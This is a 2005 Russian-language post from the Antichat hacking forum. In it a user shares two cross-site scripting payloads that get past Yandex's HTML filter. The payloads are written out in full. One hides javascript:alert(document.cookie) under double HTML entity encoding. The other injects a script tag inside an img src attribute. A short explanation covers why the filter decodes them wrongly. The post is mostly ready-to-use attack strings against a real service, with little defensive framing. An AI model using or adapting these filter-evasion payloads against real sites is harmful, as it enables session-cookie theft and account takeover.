ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

XSS в yandex.ru
  #1  
Старый 13.05.2005, 01:40
Аватар для LittleLamer
LittleLamer
Познающий
Регистрация: 04.11.2004
Сообщений: 44
Провел на форуме:
118909

Репутация: 62
Отправить сообщение для LittleLamer с помощью ICQ
По умолчанию XSS в yandex.ru

Вот на yandex нашёл 2 xss.

1.
Код:
<img src="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#55&#38&#35&#49&#48&#56&#38&#35&#49&#48&#49&#38&#35&#49&#49&#52&#38&#35&#49&#49&#54&#38&#35&#52&#48&#38&#35&#49&#48&#48&#38&#35&#49&#49&#49&#38&#35&#57&#57&#38&#35&#49&#49&#55&#38&#35&#49&#48&#57&#38&#35&#49&#48&#49&#38&#35&#49&#49&#48&#38&#35&#49&#49&#54&#38&#35&#52&#54&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#49&#38&#35&#49&#48&#55&#38&#35&#49&#48&#53&#38&#35&#49&#48&#49&#38&#35&#52&#49">
суть в том, что javascript:alert(document.cookie) кодируется к виду &#..., а потом получившаяся строчка ещё раз кодируется по такому же принципу. Фильтр один раз декодирует src и получится такое:
Код:
<img src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#41">
это "javascript..." закодированое 1 раз
а это браузер прекрасно поймёт

2.
Код:
<img src=a"&#62&#60a&#32id&#61xxx&#62&#60&#47a&#62&#60script&#62&#97&#108&#101&#114&#116&#40&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#41&#59&#60&#47script&#62&#60&#97&#32&#115&#114&#99&#61&#34>
синим цветом - alert(document.cookie);
Ошибка фильтра опять в том, что неправильно понимает содержимое src и ещё хуже декодирует строки типа &#...
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ